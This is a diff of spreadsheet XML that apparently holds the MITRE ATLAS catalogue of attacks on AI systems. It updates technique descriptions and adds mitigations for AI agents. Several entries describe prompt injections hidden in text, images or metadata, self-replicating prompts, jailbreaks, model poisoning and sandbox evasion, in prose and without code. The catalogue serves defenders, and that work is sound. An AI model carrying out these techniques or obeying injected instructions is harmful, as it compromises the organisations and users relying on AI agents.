-Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.[1][2]
-For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.[3][4]
-Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through Disable or Modify Tools or Disable or Modify Cloud Logs.</t>
+    <t>Adversaries may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), software-as-a-service (SaaS), or AI-as-a-service (AIaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, AI Inference, Generative AI, Agentic AI, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
+Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity. They may use tools to check credentials and enumerate the AI models available in various AIaaS providers' environments including AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI [\[1\]][1].
+[1]: https://www.sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell.
@@ -1473,6 +1551,9 @@
 An adversary can poison a dataset by modifying the labels being generated by the labeling service.</t>
   </si>
   <si>
+    <t>Adversaries may invoke an AI agent's tool capable of performing mutative operations to perform Data Destruction. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.</t>
+  </si>
+  <si>
     <t>Adversaries may use their access to a victim organization's AI-enabled services to collect proprietary or otherwise sensitive information. As organizations adopt generative AI in centralized services for accessing an organization's data, such as with chat agents which can access retrieval augmented generation (RAG) databases and other data sources via tools, they become increasingly valuable targets for adversaries.
 AI agents may be configured to have access to tools and data sources that are not directly accessible by users. Adversaries may abuse this to collect data that a regular user wouldn't be able to access directly.</t>
   </si>
@@ -1609,7 +1690,7 @@
     <t>Adversaries may extract a functional copy of a private model.
 By repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.
 The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.
-Adversaries may extract the model to avoid paying per query in an artificial intelligence as a service (AIaaS) setting.
+Adversaries may extract the model to avoid paying per query in an artificial-intelligence-as-a-service (AIaaS) setting.
 Model extraction is used for [AI Intellectual Property Theft](/techniques/AML.T0048.004).</t>
   </si>
   <si>
@@ -1645,8 +1726,21 @@
 Adversaries may utilize open-source models and software that were designed for legitimate use cases to generate deepfakes for malicious use. However, there are some projects specifically tailored towards malicious use cases such as [ProKYC](https://www.catonetworks.com/blog/prokyc-selling-deepfake-tool-for-account-fraud-attacks/).</t>
   </si>
   <si>
-    <t>Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, including generating malware or offensive cyber scripts, [Retrieval Content Crafting](/techniques/AML.T0066), or generating [Phishing](/techniques/AML.T0052) content.
-Adversaries may obtain an open source model or they may leverage a generative AI service. They may need to jailbreak the generative AI model to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the generative AI.</t>
+    <t>Adversaries may use large language models (LLMs) to dynamically generate malicious commands from natural language. Dynamically generated commands may be harder detect as the attack signature is constantly changing. AI-generated commands may also allow adversaries to more rapidly adapt to different environments and adjust their tactics.
+Adversaries may utilize LLMs present in the victim's environment or call out to externally hosted services. [APT28](https://attack.mitre.org/groups/G0007) utilized a model hosted on HuggingFace in a campaign with their LAMEHUG malware [\[1\]][1]. In either case prompts to generate malicious code can blend in with normal traffic.
+[1]: https://logpoint.com/en/blog/apt28s-new-arsenal-lamehug-the-first-ai-powered-malware</t>
+  </si>
+  <si>
+    <t>Adversaries may search for and obtain generative AI models or tools, such as large language models (LLMs), to assist them in various steps of their operation. Generative AI can be used in a variety of malicious ways, such as to generating malware, to [Generate Deepfakes](/techniques/AML.T0088), to [Generate Malicious Commands](/techniques/AML.T0102), for [Retrieval Content Crafting](/techniques/AML.T0066), or to generate [Phishing](/techniques/AML.T0052) content.
+Adversaries may obtain open source models and serve them locally using frameworks such as [Ollama](https://ollama.com/) or [vLLM]( https://docs.vllm.ai/en/latest/). They may host them using cloud infrastructure. Or, they may leverage AI service providers such as HuggingFace.
+They may need to jailbreak the model (see [LLM Jailbreak](/techniques/AML.T0054)) to bypass any restrictions put in place to limit the types of responses it can generate. They may also need to break the terms of service of the model's developer.
+Generative AI models may also be "uncensored" meaning they are designed to generate content without any restrictions such as guardrails or content filters. Uncensored GenAI is ripe for abuse by cybercriminals [\[1\]][1] [\[2\]][2]. Models may be fine-tuned to remove alignment and guardrails [\[3\]][3] or be subjected to targeted manipulations to bypass refusal [\[4\]][4] resulting in uncensored variants of the model. Uncensored models may be built for offensive and defensive cybersecurity [\[5\]][5], which can be abused by an adversary. There are also models that are expressly designed and advertised for malicious use [\[6\]][6].
+[1]: https://blog.talosintelligence.com/cybercriminal-abuse-of-large-language-models/
+[2]: https://gbhackers.com/cybercriminals-exploit-llm-models/
+[3]: https://erichartford.com/uncensored-models
+[4]: https://arxiv.org/abs/2406.11717/
+[5]: https://taico.ca/posts/whiterabbitneo/
+[6]: https://gbhackers.com/wormgpt-enhanced-with-grok-and-mixtral/</t>
   </si>
   <si>
     <t>Adversaries may target AI systems by disrupting or manipulating the hardware supply chain. AI models often run on specialized hardware such as GPUs, TPUs, or embedded devices, but may also be optimized to operate on CPUs.</t>
@@ -1709,7 +1803,7 @@
   </si>
   <si>
     <t>Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.
-This may include modifying how the injection is rendered such as small text, text colored the same as the background, or hidden HTML elements.</t>
+For text inputs, this may include modifying how the instructions are rendered such as small text, text colored the same as the background, or hidden HTML elements. For multi-modal inputs, malicious instructions could be hidden in the data itself (e.g. in the pixels of an image) or in file metadata (e.g. EXIF for images, ID3 tags for audio, or document metadata).</t>
   </si>
   <si>
     <t>An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).</t>
@@ -1804,7 +1898,7 @@
   </si>
   <si>
     <t>Adversaries may manipulate an AI model's weights to change it's behavior or performance, resulting in a poisoned model.
-Adversaries may poison a model by by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process. 
+Adversaries may poison a model by directly manipulating its weights, training the model on poisoned data, further fine-tuning the model, or otherwise interfering with its training process. 
 The change in behavior of poisoned models may be limited to targeted categories in predictive AI models, or targeted topics, concepts, or facts in generative AI models, or aim for a general performance degradation.</t>
   </si>
   <si>
@@ -1828,7 +1922,7 @@
   </si>
   <si>
     <t>An adversary may introduce malicious prompts into the victim's system via a public-facing application with the intention of it being ingested by an AI at some point in the future and ultimately having a downstream effect. This may occur when a data source is indexed by a retrieval augmented generation (RAG) system, when a rule triggers an action by an AI agent, or when a user utilizes a large language model (LLM) to interact with the malicious content. The malicious prompts may persist on the victim system for an extended period and could affect multiple users and various AI tools within the victim organization.
-Any public-facing application that accepts text input could be a target. This includes email, shared document systems like OneDrive or Google Drive, and service desks or ticketing systems like Jira.
+Any public-facing application that accepts text input could be a target. This includes email, shared document systems like OneDrive or Google Drive, and service desks or ticketing systems like Jira. This also includes OCR-mediated infiltration where malicious instructions are embedded in images, screenshots, and invoices that are ingested into the system.
 Adversaries may perform [Reconnaissance](/tactics/AML.TA0002) to identify public facing applications that are likely monitored by an AI agent or are likely to be indexed by a RAG. They may perform [Discover AI Agent Configuration](/techniques/AML.T0084) to refine their targeting.</t>
   </si>
   <si>
@@ -1913,7 +2007,8 @@
   </si>
   <si>
     <t>Adversaries may spam the AI system with chaff data that causes increase in the number of detections.
-This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.</t>
+This can cause analysts at the victim organization to waste time reviewing and correcting incorrect inferences.
+Adversaries may also spam AI agents with excessive low-severity auditable events or agentic actions that require a human-in-the-loop, wasting time for the victim organization in human review of the agentic AI system.</t>
   </si>
   <si>
     <t xml:space="preserve">Adversaries may turn LLMs into targeted social engineers.
@@ -2013,14 +2108,28 @@
 </t>
   </si>
   <si>
+    <t>Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads.
+Adversaries may use several methods to accomplish Virtualization/Sandbox Evasion such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization such as registry keys (e.g. substrings matching Vmware, VBOX, QEMU), environment variables (e.g. substrings matching VBOX, VMWARE, PARALLELS), NIC MAC addresses (e.g. prefixes 00-05-69 (VMWare) or 08-00-27 (VirtualBox)), running processes (e.g. vmware.exe, vboxservice.exe, qemu-ga.exe) [\[1\]][1].
+[1]: https://research.checkpoint.com/2025/ai-evasion-prompt-injection/</t>
+  </si>
+  <si>
     <t xml:space="preserve">In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly.
 Adversarial examples trained in this manner are most effective against the target model.
 </t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0100</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0080</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0098</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0099</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0053</t>
   </si>
   <si>
@@ -2039,6 +2148,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0040</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0096</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0010.001</t>
   </si>
   <si>
@@ -2108,6 +2220,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0010.002</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0101</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0085</t>
   </si>
   <si>
@@ -2216,6 +2331,9 @@
     <t>https://atlas.mitre.org/techniques/AML.T0088</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0102</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
   </si>
   <si>
@@ -2435,9 +2553,15 @@
     <t>https://atlas.mitre.org/techniques/AML.T0042</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/techniques/AML.T0097</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
+    <t>25 November 2025</t>
+  </si>
+  <si>
     <t>30 September 2025</t>
   </si>
   <si>
@@ -2447,6 +2571,9 @@
     <t>13 May 2021</t>
   </si>
   <si>
+    <t>24 December 2025</t>
+  </si>
+  <si>
     <t>28 October 2025</t>
   </si>
   <si>
@@ -2495,6 +2622,12 @@
     <t>13 October 2025</t>
   </si>
   <si>
+    <t>19 December 2025</t>
+  </si>
+  <si>
+    <t>23 December 2025</t>
+  </si>
+  <si>
     <t>12 January 2024</t>
   </si>
   <si>
@@ -2507,18 +2640,27 @@
     <t>17 April 2025</t>
   </si>
   <si>
-    <t>25 November 2025</t>
-  </si>
-  <si>
     <t>06 November 2025</t>
   </si>
   <si>
+    <t>18 December 2025</t>
+  </si>
+  <si>
+    <t>20 December 2025</t>
+  </si>
+  <si>
     <t>29 April 2024</t>
   </si>
   <si>
+    <t>Execution</t>
+  </si>
+  <si>
     <t>Persistence</t>
   </si>
   <si>
+    <t>Credential Access</t>
+  </si>
+  <si>
     <t>Execution, Privilege Escalation</t>
   </si>
   <si>
@@ -2534,6 +2676,9 @@
     <t>AI Model Access</t>
   </si>
   <si>
+    <t>Command and Control</t>
+  </si>
+  <si>
     <t>Initial Access</t>
   </si>
   <si>
@@ -2549,12 +2694,6 @@
     <t>AI Attack Staging</t>
   </si>
   <si>
-    <t>Execution</t>
-  </si>
-  <si>
-    <t>Credential Access</t>
-  </si>
-  <si>
     <t>Defense Evasion, Impact, Initial Access</t>
   </si>
   <si>
@@ -2567,16 +2706,19 @@
     <t>AI Attack Staging, Persistence</t>
   </si>
   <si>
+    <t>Initial Access, Lateral Movement</t>
+  </si>
+  <si>
     <t>Persistence, Resource Development</t>
   </si>
   <si>
     <t>Initial Access, Persistence</t>
   </si>
   <si>
-    <t>Command and Control</t>
-  </si>
-  <si>
     <t>Lateral Movement</t>
+  </si>
+  <si>
+    <t>Initial Access, Privilege Escalation</t>
   </si>
   <si>
     <t>ATLAS</t>
@@ -2854,6 +2996,9 @@
     <t>AML.M0019</t>
   </si>
   <si>
+    <t>AML.M0034</t>
+  </si>
+  <si>
     <t>AML.M0012</t>
   </si>
   <si>
@@ -2872,6 +3017,9 @@
     <t>AML.M0010</t>
   </si>
   <si>
+    <t>AML.M0033</t>
+  </si>
+  <si>
     <t>AML.M0001</t>
   </si>
   <si>
@@ -2905,6 +3053,9 @@
     <t>AML.M0007</t>
   </si>
   <si>
+    <t>AML.M0032</t>
+  </si>
+  <si>
     <t>AML.M0027</t>
   </si>
   <si>
@@ -2950,6 +3101,9 @@
     <t>course-of-action--9ae01d8c-c75b-5d11-944f-16edbb7d754f</t>
   </si>
   <si>
+    <t>course-of-action--b5f63458-7f5c-5631-9056-1dfa6e7cf946</t>
+  </si>
+  <si>
     <t>course-of-action--33f3432f-83e7-5d59-924c-ed2b817c2214</t>
   </si>
   <si>
@@ -2968,6 +3122,9 @@
     <t>course-of-action--1c8b96b0-c21f-5a9b-b478-ddd9ac40f686</t>
   </si>
   <si>
+    <t>course-of-action--daf56cc6-425a-5cbf-a2b0-dbe9af3d9b82</t>
+  </si>
+  <si>
     <t>course-of-action--68a1c707-b05e-5588-b0a3-01aa35182ed0</t>
   </si>
   <si>
@@ -3001,6 +3158,9 @@
     <t>course-of-action--aba79819-27d3-5204-9fed-011613fa8136</t>
   </si>
   <si>
+    <t>course-of-action--9fb0623f-14f3-58e1-a44b-16dbb0fd0bae</t>
+  </si>
+  <si>
     <t>course-of-action--5537712b-0001-5d3a-b12f-041d78a837a7</t>
   </si>
   <si>
@@ -3046,6 +3206,9 @@
     <t>Control Access to AI Models and Data in Production</t>
   </si>
   <si>
+    <t>Deepfake Detection</t>
+  </si>
+  <si>
     <t>Encrypt Sensitive Information</t>
   </si>
   <si>
@@ -3064,6 +3227,9 @@
     <t>Input Restoration</t>
   </si>
   <si>
+    <t>Input and Output Validation for AI Agent Components</t>
+  </si>
+  <si>
     <t>Limit Model Artifact Release</t>
   </si>
   <si>
@@ -3095,6 +3261,9 @@
   </si>
   <si>
     <t>Sanitize Training Data</t>
+  </si>
+  <si>
+    <t>Segmentation of AI Agent Components</t>
   </si>
   <si>
     <t>Single-User AI Agent Permissions Configuration</t>
@@ -3130,7 +3299,7 @@
 Also consider computing features in the cloud to prevent gray-box attacks, where an adversary has access to the model preprocessing methods.</t>
   </si>
   <si>
-    <t>Implement logging of inputs and outputs of deployed AI models. Monitoring logs can help to detect security threats and mitigate impacts.
+    <t>Implement logging of inputs and outputs of deployed AI models. When deploying AI agents, implement logging of the intermediate steps of agentic actions and decisions, data access and tool use, and identity of the agent. Monitoring logs can help to detect security threats and mitigate impacts.
 Additionally, having logging enabled can discourage adversaries who want to remain undetected from utilizing AI resources.</t>
   </si>
   <si>
@@ -3150,6 +3319,13 @@
 </t>
   </si>
   <si>
+    <t>Apply deepfake detection algorithms against any untrusted or user-provided data, especially in impactful applications such as biometric verification, to block generated content.
+Detectors may use a combination of approaches, including:
+-	AI models trained to differentiate between real and deepfake content.
+-	Identifying common inconsistencies in deepfake content, such as unnatural facial movements, audio mismatches, or pixel-level artifacts.
+-	Biometrics analysis, such blinking, eye movements, and microexpressions.</t>
+  </si>
+  <si>
     <t>Encrypt sensitive data such as AI models to protect against adversaries attempting to access sensitive data.</t>
   </si>
   <si>
@@ -3173,6 +3349,9 @@
 </t>
   </si>
   <si>
+    <t>Implement validation on inputs and outputs for the tools and data sources used by AI agents. Validation includes enforcing a common data format, schema validation, checks for sensitive or prohibited information leakage, and data sanitization to remove potential injections or unsafe code. Input and output validation can help prevent compromises from spreading in AI-enabled systems and can help secure the workflow when multiple components are chained together. Validation should be performed external to the AI agent.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Limit public release of technical project details including data, algorithms, model architectures, and model checkpoints that are used in production, or that are representative of those used in production.
 </t>
   </si>
@@ -3189,8 +3368,7 @@
     <t>Use techniques to make AI models robust to adversarial inputs such as adversarial training or network distillation.</t>
   </si>
   <si>
-    <t xml:space="preserve">Decreasing the fidelity of model outputs provided to the end user can reduce an adversaries ability to extract information about the model and optimize attacks for the model.
-</t>
+    <t>Decreasing the fidelity of model outputs provided to the end user can reduce an adversary's ability to extract information about the model and optimize attacks for the model.</t>
   </si>
   <si>
     <t>AI agents may be granted elevated privileges above that of a normal user to enable desired workflows. When deploying a privileged AI agent, or an agent that interacts with multiple users, it is important to implement robust policies and controls on permissions of the privileged agent. These controls include Role-Based Access Controls (RBAC), Attribute-Based Access Controls (ABAC), and the principle of least privilege so that the agent is only granted the necessary permissions to access tools and resources required to accomplish its designated task(s).</t>
@@ -3213,6 +3391,9 @@
 </t>
   </si>
   <si>
+    <t>Define security boundaries around agentic tools and data sources with methods such as API access, container isolation, code execution sandboxing, and rate limiting of tool invocation. This restricts untrusted processes or potential compromises from spreading throughout the system.</t>
+  </si>
+  <si>
     <t>When deploying an AI agent that acts as a representative of a user and performs actions on their behalf, it is important to implement robust policies and controls on permissions and lifecycle management of the agent. Lifecycle management involves establishing identity, protocols for access management, and decommissioning of the agent when its role is no longer needed. Controls should also include the principle of least privilege and delegated access from the user account. When acting as a representative of a user, the AI agent should not be granted permissions that the user would not be granted within the system or organization.</t>
   </si>
   <si>
@@ -3224,11 +3405,12 @@
 </t>
   </si>
   <si>
-    <t>Educate AI model developers on secure coding practices and AI vulnerabilities.</t>
-  </si>
-  <si>
-    <t>Validate that AI models perform as intended by testing for backdoor triggers or adversarial influence.
-Monitor model for concept drift and training data drift, which may indicate data tampering and poisoning.</t>
+    <t>Educate AI model developers to on AI supply chain risks and potentially malicious AI artifacts.
+Educate users on how to identify deepfakes and phishing attempts.</t>
+  </si>
+  <si>
+    <t>Validate that AI models perform as intended by testing for backdoor triggers, potential for data leakage, or adversarial influence.
+Monitor AI model for concept drift and training data drift, which may indicate data tampering and poisoning.</t>
   </si>
   <si>
     <t>Verify the cryptographic checksum of all AI artifacts to verify that the file was not modified by an attacker.</t>
@@ -3238,7 +3420,7 @@
 File formats such as pickle files that are commonly used to store AI models can contain exploits that allow for arbitrary code execution.
 These files should be scanned for potentially unsafe calls, which could be used to execute code, create new processes, or establish networking capabilities.
 Adversaries may embed malicious code in model corrupt model files, so scanners should be capable of working with models that cannot be fully de-serialized.
-Both model artifacts and downstream products produced by models should be scanned for known vulnerabilities.</t>
+Model artifacts, downstream products produced by models, and external software dependencies should be scanned for known vulnerabilities.</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0028</t>
@@ -3265,6 +3447,9 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0019</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0034</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0012</t>
   </si>
   <si>
@@ -3283,6 +3468,9 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0010</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0033</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0001</t>
   </si>
   <si>
@@ -3316,6 +3504,9 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0007</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0032</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0027</t>
   </si>
   <si>
@@ -3338,12 +3529,6 @@
   </si>
   <si>
     <t>12 April 2023</t>
-  </si>
-  <si>
-    <t>13 August 2025</t>
-  </si>
-  <si>
-    <t>21 April 2025</t>
   </si>
 </sst>
 </file>
@@ -3752,7 +3937,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I141"/>
+  <dimension ref="A1:I148"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -3792,28 +3977,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>149</v>
+        <v>156</v>
       </c>
       <c r="C2" t="s">
-        <v>289</v>
+        <v>303</v>
       </c>
       <c r="D2" t="s">
-        <v>429</v>
+        <v>450</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>569</v>
+        <v>597</v>
       </c>
       <c r="F2" t="s">
-        <v>709</v>
+        <v>744</v>
       </c>
       <c r="G2" t="s">
-        <v>727</v>
+        <v>744</v>
       </c>
       <c r="H2" t="s">
-        <v>735</v>
+        <v>775</v>
       </c>
       <c r="I2" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -3821,28 +4006,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>150</v>
+        <v>157</v>
       </c>
       <c r="C3" t="s">
-        <v>290</v>
+        <v>304</v>
       </c>
       <c r="D3" t="s">
-        <v>430</v>
+        <v>451</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>570</v>
+        <v>598</v>
       </c>
       <c r="F3" t="s">
-        <v>710</v>
+        <v>745</v>
       </c>
       <c r="G3" t="s">
-        <v>718</v>
+        <v>764</v>
       </c>
       <c r="H3" t="s">
-        <v>736</v>
+        <v>776</v>
       </c>
       <c r="I3" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -3850,28 +4035,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>151</v>
+        <v>158</v>
       </c>
       <c r="C4" t="s">
-        <v>291</v>
+        <v>305</v>
       </c>
       <c r="D4" t="s">
-        <v>431</v>
+        <v>452</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>571</v>
+        <v>599</v>
       </c>
       <c r="F4" t="s">
-        <v>709</v>
+        <v>744</v>
       </c>
       <c r="G4" t="s">
-        <v>709</v>
+        <v>765</v>
       </c>
       <c r="H4" t="s">
-        <v>737</v>
+        <v>777</v>
       </c>
       <c r="I4" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -3879,28 +4064,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>152</v>
+        <v>159</v>
       </c>
       <c r="C5" t="s">
-        <v>292</v>
+        <v>306</v>
       </c>
       <c r="D5" t="s">
-        <v>432</v>
+        <v>453</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>572</v>
+        <v>600</v>
       </c>
       <c r="F5" t="s">
-        <v>711</v>
+        <v>744</v>
       </c>
       <c r="G5" t="s">
-        <v>720</v>
+        <v>744</v>
       </c>
       <c r="H5" t="s">
-        <v>737</v>
+        <v>776</v>
       </c>
       <c r="I5" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -3908,28 +4093,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>153</v>
+        <v>160</v>
       </c>
       <c r="C6" t="s">
-        <v>293</v>
+        <v>307</v>
       </c>
       <c r="D6" t="s">
-        <v>433</v>
+        <v>454</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>573</v>
+        <v>601</v>
       </c>
       <c r="F6" t="s">
-        <v>711</v>
+        <v>746</v>
       </c>
       <c r="G6" t="s">
-        <v>720</v>
+        <v>755</v>
       </c>
       <c r="H6" t="s">
-        <v>738</v>
+        <v>778</v>
       </c>
       <c r="I6" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -3937,28 +4122,28 @@
         <v>14</v>
       </c>
       <c r="B7" t="s">
-        <v>154</v>
+        <v>161</v>
       </c>
       <c r="C7" t="s">
-        <v>294</v>
+        <v>308</v>
       </c>
       <c r="D7" t="s">
-        <v>434</v>
+        <v>455</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>574</v>
+        <v>602</v>
       </c>
       <c r="F7" t="s">
-        <v>711</v>
+        <v>745</v>
       </c>
       <c r="G7" t="s">
-        <v>720</v>
+        <v>745</v>
       </c>
       <c r="H7" t="s">
-        <v>739</v>
+        <v>779</v>
       </c>
       <c r="I7" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -3966,28 +4151,28 @@
         <v>15</v>
       </c>
       <c r="B8" t="s">
-        <v>155</v>
+        <v>162</v>
       </c>
       <c r="C8" t="s">
-        <v>295</v>
+        <v>309</v>
       </c>
       <c r="D8" t="s">
-        <v>435</v>
+        <v>456</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>575</v>
+        <v>603</v>
       </c>
       <c r="F8" t="s">
-        <v>711</v>
+        <v>747</v>
       </c>
       <c r="G8" t="s">
-        <v>713</v>
+        <v>757</v>
       </c>
       <c r="H8" t="s">
-        <v>740</v>
+        <v>779</v>
       </c>
       <c r="I8" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -3995,28 +4180,28 @@
         <v>16</v>
       </c>
       <c r="B9" t="s">
-        <v>156</v>
+        <v>163</v>
       </c>
       <c r="C9" t="s">
-        <v>296</v>
+        <v>310</v>
       </c>
       <c r="D9" t="s">
-        <v>436</v>
+        <v>457</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>576</v>
+        <v>604</v>
       </c>
       <c r="F9" t="s">
-        <v>711</v>
+        <v>747</v>
       </c>
       <c r="G9" t="s">
-        <v>720</v>
+        <v>757</v>
       </c>
       <c r="H9" t="s">
-        <v>741</v>
+        <v>780</v>
       </c>
       <c r="I9" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -4024,28 +4209,28 @@
         <v>17</v>
       </c>
       <c r="B10" t="s">
-        <v>157</v>
+        <v>164</v>
       </c>
       <c r="C10" t="s">
-        <v>297</v>
+        <v>311</v>
       </c>
       <c r="D10" t="s">
-        <v>437</v>
+        <v>458</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>577</v>
+        <v>605</v>
       </c>
       <c r="F10" t="s">
-        <v>711</v>
+        <v>747</v>
       </c>
       <c r="G10" t="s">
-        <v>720</v>
+        <v>757</v>
       </c>
       <c r="H10" t="s">
-        <v>741</v>
+        <v>781</v>
       </c>
       <c r="I10" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -4053,28 +4238,28 @@
         <v>18</v>
       </c>
       <c r="B11" t="s">
-        <v>158</v>
+        <v>165</v>
       </c>
       <c r="C11" t="s">
-        <v>298</v>
+        <v>312</v>
       </c>
       <c r="D11" t="s">
-        <v>438</v>
+        <v>459</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>578</v>
+        <v>606</v>
       </c>
       <c r="F11" t="s">
-        <v>711</v>
+        <v>747</v>
       </c>
       <c r="G11" t="s">
-        <v>720</v>
+        <v>750</v>
       </c>
       <c r="H11" t="s">
-        <v>740</v>
+        <v>782</v>
       </c>
       <c r="I11" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -4082,28 +4267,28 @@
         <v>19</v>
       </c>
       <c r="B12" t="s">
-        <v>159</v>
+        <v>166</v>
       </c>
       <c r="C12" t="s">
-        <v>299</v>
+        <v>313</v>
       </c>
       <c r="D12" t="s">
-        <v>439</v>
+        <v>460</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>579</v>
+        <v>607</v>
       </c>
       <c r="F12" t="s">
-        <v>711</v>
+        <v>748</v>
       </c>
       <c r="G12" t="s">
-        <v>713</v>
+        <v>766</v>
       </c>
       <c r="H12" t="s">
-        <v>738</v>
+        <v>783</v>
       </c>
       <c r="I12" t="s">
-        <v>756</v>
+        <v>798</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -4111,28 +4296,28 @@
         <v>20</v>
       </c>
       <c r="B13" t="s">
-        <v>160</v>
+        <v>167</v>
       </c>
       <c r="C13" t="s">
-        <v>300</v>
+        <v>314</v>
       </c>
       <c r="D13" t="s">
-        <v>440</v>
+        <v>461</v>
       </c>
